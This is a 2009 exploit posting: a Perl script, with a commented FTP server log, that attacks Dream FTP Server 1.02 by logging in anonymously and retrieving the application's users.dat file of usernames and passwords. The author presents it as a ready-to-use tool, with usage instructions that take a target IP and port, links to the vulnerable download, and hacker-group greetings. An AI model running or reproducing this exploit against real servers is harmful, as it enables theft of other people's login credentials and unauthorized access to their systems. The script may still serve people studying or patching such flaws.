dreamftp-disclose.txt
Posted on 23 April 2009
#!/usr/bin/perl -w # # This Bug Similar to others found By My Friend : Stack <= so special Thanx # So You Can Exploit Arbitrary File Disclosure From The Server <== You can use Stack's Exploit To do That # But This Exploit i will get Users & Passwords Of The applicatin From : users.dat : C:Program FilesBolinTechusers.dat # In This Exploit I Used The Port 80 You can use any port you want 21 ################################################################################################################################# #23/04/2009 13:20:25 FTP Server started on port 80. #23/04/2009 13:25:43 [0000000002] Client connected from 127.0.0.1. #23/04/2009 13:25:43 [0000000002] 220- **************************************** #23/04/2009 13:25:43 [0000000002] 220- #23/04/2009 13:25:43 [0000000002] 220- Welcome to Dream FTP Server #23/04/2009 13:25:43 [0000000002] 220- Copyright 2002 - 2004 #23/04/2009 13:25:43 [0000000002] 220- BolinTech Inc. #23/04/2009 13:25:43 [0000000002] 220- #23/04/2009 13:25:43 [0000000002] 220- **************************************** #23/04/2009 13:25:43 [0000000002] 220- #23/04/2009 13:25:43 [0000000002] 220 #23/04/2009 13:25:43 [0000000002] USER anonymous #23/04/2009 13:25:43 [0000000002] 331 Password required for anonymous #23/04/2009 13:25:43 [0000000002] PASS ********** #23/04/2009 13:25:43 [0000000002] 230 User successfully logged in. #23/04/2009 13:25:43 [0000000002] PWD #23/04/2009 13:25:43 [0000000002] 257 "/" is current directory. #23/04/2009 13:25:43 [0000000002] TYPE I #23/04/2009 13:25:43 [0000000002] 200 Type set to I #23/04/2009 13:25:43 [0000000002] CWD Program Files #23/04/2009 13:25:43 [0000000002] 250 "/Program Files" is current directory. #23/04/2009 13:25:43 [0000000002] CWD BolinTech #23/04/2009 13:25:43 [0000000002] 250 "/Program Files/BolinTech" is current directory. #23/04/2009 13:25:43 [0000000002] MDTM users.dat #23/04/2009 13:25:43 [0000000002] 502 Command not implemented - Try HELP. #23/04/2009 13:25:43 [0000000002] PASV #23/04/2009 13:25:43 [0000000002] 227 Entering Passive Mode (127,0,0,1,11,145). #23/04/2009 13:25:43 [0000000002] RETR users.dat #23/04/2009 13:25:43 [0000000002] 150 Opening BINARY mode data connection for file transfer. #23/04/2009 13:25:43 [0000000002] 226 Transfer complete #23/04/2009 13:25:43 [0000000002] Client disconnected from 127.0.0.1. ################################################################################################################################# # Download Product : http://www.softpedia.com/progDownload/Dream-FTP-Server-Download-47248.html # Special Thanx To All My Friends : Hussin X , ZoRLu , Jiko , Stack , SimO-sofT , Mag!c ompo , b0rizq , All MoroCCaN Hackers ################################################################################################################################# # welcome To : WwW.Ma-HaxOrZ.CoM/vb <== Is Online ################################################################################################################################# # Screenshot From My MS SP2 FR when exploiting in localhost : http://www.exploiter5.com/blog/Disclosure.png ################################################################################################################################# use LWP::Simple; use LWP::UserAgent; print " Dream FTP Server 1.02 (users.dat) Passwords/users Disclosure Exploit "; print " **************************************************************** "; print " * Found And Exploited By : Cyber-Zone (ABDELKHALEK) * "; print " * E-mail : Paradis_des_fous[at]hotmail.fr * "; print " * Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM * "; print " * From : MoroccO Figuig/Oujda City * "; print " **************************************************************** "; if(@ARGV < 3) { &help; exit(); } sub help() { print "[X] Usage : perl $0 HackerName IP Port "; print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 "; } ($HackerName, $TargetIP, $AttackedPort) = @ARGV; print("Please Wait ! Connecting To The Server ...... "); sleep(5); print(" ****************************** "); print(" * Status * "); print(" ****************************** "); print("$HackerName , AttaCking The Target : $TargetIP "); print("On The Port : $AttackedPort , Just To Get Users/Passwords File :d "); $terget1="Program Files"; $target2="BolinTech"; $target3="users.dat"; $slash="/"; $TargetFile=$terget1.$slash.$target2.$slash.$target3; $temp="/" x 2; my $boom = "ftp://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile; print("Exploiting .....> |80 "); sleep(15); print("Exploiting ..........|Done! "); sleep(5); $Disclosure=get $boom; print(" ............File Contents Are Just Below........... "); print("$Disclosure "); print(".........................EOF....................... "); print("Done For Fun //Figuigian HaCker "); print("Some Womens Makes The World Special , Just By Being On it <3 ");
